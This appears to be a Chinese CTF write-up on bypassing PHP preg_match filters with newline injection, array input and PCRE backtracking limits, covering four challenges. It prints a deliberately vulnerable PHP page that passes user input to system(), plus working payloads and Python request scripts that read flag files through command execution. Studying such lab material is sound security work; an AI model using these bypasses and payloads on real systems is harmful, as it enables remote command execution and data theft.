【Web】preg_match绕过相关例题wp

目录

[①[FBCTF 2019]rceservice](#①[FBCTF 2019]rceservice)

②[ctfshow]web130

③[ctfshow]web131

[④[NISACTF 2022]middlerce](#④[NISACTF 2022]middlerce)


简单回顾一下基础

参考文章

p牛神文

preg_match绕过总的来讲就三块可利用

数组绕过、PCRE回溯次数限制、换行符

①[FBCTF 2019]rceservice

先贴出附件给的源码

复制代码
<html>
  <body>
    <h1>Web Adminstration Interface</h1>

<?php

putenv('PATH=/home/rceservice/jail');

if (isset($_REQUEST['cmd'])) {
  $json = $_REQUEST['cmd'];

  if (!is_string($json)) {
    echo 'Hacking attempt detected<br/><br/>';
  } elseif (preg_match('/^.*(alias|bg|bind|break|builtin|case|cd|command|compgen|complete|continue|declare|dirs|disown|echo|enable|eval|exec|exit|export|fc|fg|getopts|hash|help|history|if|jobs|kill|let|local|logout|popd|printf|pushd|pwd|read|readonly|return|set|shift|shopt|source|suspend|test|times|trap|type|typeset|ulimit|umask|unalias|unset|until|wait|while|[\x00-\x1FA-Z0-9!#-\/;-@\[-`|~\x7F]+).*$/', $json)) {
    echo 'Hacking attempt detected<br/><br/>';
  } else {
    echo 'Attempting to run command:<br/>';
    $cmd = json_decode($json, true)['cmd'];
    if ($cmd !== NULL) {
      system($cmd);
    } else {
      echo 'Invalid input';
    }
    echo '<br/><br/>';
  }
}

?>

    <form>
      Enter command as JSON:
      <input name="cmd" />
    </form>
  </body>
</html>

先进行一个命令的输

复制代码
{"cmd":"ls"}

这里用%0a绕过preg_match

复制代码
 {%0a"cmd":"ls /home/rceservice"%0a}

因为putenv('PATH=/home/rceservice/jail');修改了环境变量,所以只能使用绝对路径使用cat命令,cat命令在/bin文件夹下

系统命令需要有特定的环境变量的也就是路径,系统找不到该路径下的exe文件无法执行系统命令,因此这个地方查阅资料后发现只能调用绝对路径下的命令,cat命令就在/bin/目录下面

复制代码
{%0a"cmd":"/bin/cat /home/rceservice/flag"%0a}

或者用PCRE回溯次数限制

复制代码
import requests

url = "http://node4.anna.nssctf.cn:28428/"
data = {
    'cmd':'{"cmd":"/bin/cat /home/rceservice/flag","r1":"'+'a'*1000000+'"}'
}
r=requests.post(url=url,data=data).text #使用post方法请求,get方法会因为请求头过大而报错
print(r)

②[ctfshow]web130

preg_match():其中的'.'代表着匹配前面的单个字符,'+'代表匹配一次或者是多次,'+?'代表重复一次或者多次,尽可能的少重复;(大概就是匹配到*ctfshow,*代表任意字符,就会返回true)

stripos()函数:不区分大小写,返回子串在字符串中第一次出现的位置,位置是从0开始的;没有查找到,返回FALSE,stripos函数对于传递数组情况下,返回值为NULL,NULL!=FALSE

payload1:

复制代码
f[]=1

payload2:

复制代码
import requests

url = 'http://aec6932e-6362-4305-a31f-d8e5bcf75925.challenge.ctf.show/'
data = {

    'f': 'very' * 250000 + 'ctfshow'
}
r = requests.post(url=url, data=data).text
print(r)

③[ctfshow]web131

这里和上题不同的是对$f先进行了一个String强制类型转换

具体见此文

意思就是不能用数组绕过了

所以用用PCRE回溯次数限制

payload:

复制代码
import requests

url = 'http://c061faf3-dfef-42c6-8dd4-f223a635b59c.challenge.ctf.show/'
data = {
    'f': 'very' * 250000 + '36Dctfshow'
}

r = requests.post(url=url, data=data).text
print(r)

④[NISACTF 2022]middlerce

(和题①不能说一模一样只能说是如出一辙 )

payload:

复制代码
import requests
url = "http://node4.anna.nssctf.cn:28848/"
# 直接构造json串
data='{"cmd":"?><?= `nl /f*`?>;","overflow":"'+"-"*1000000+'"}'
res = requests.post(url=url,data={"letter":data})
print(res.text)

(因为有一些waf,所以这样构造,这里不深入讨论)

相关推荐
诗句藏于尽头6 分钟前
内网使用rustdesk搭建远程桌面详细版
笔记
蜡笔小电芯7 分钟前
【C语言】指针与回调机制学习笔记
c语言·笔记·学习
乌兰麦朵12 分钟前
Vue吹的颅内高潮,全靠选择性失明和 .value 的PUA!
前端·vue.js
Code季风12 分钟前
Gin Web 层集成 Viper 配置文件和 Zap 日志文件指南(下)
前端·微服务·架构·go·gin
蓝倾13 分钟前
如何使用API接口实现淘宝商品上下架监控?
前端·后端·api
舂春儿14 分钟前
如何快速统计项目代码行数
前端·后端
毛茸茸14 分钟前
⚡ 从浏览器到编辑器只需1秒,这个React定位工具改变了我的开发方式
前端
Pedantic15 分钟前
我们什么时候应该使用协议继承?——Swift 协议继承的应用与思
前端·后端
Software攻城狮16 分钟前
vite打包的简单配置
前端
Codebee16 分钟前
如何利用OneCode注解驱动,快速训练一个私有的AI代码助手
前端·后端·面试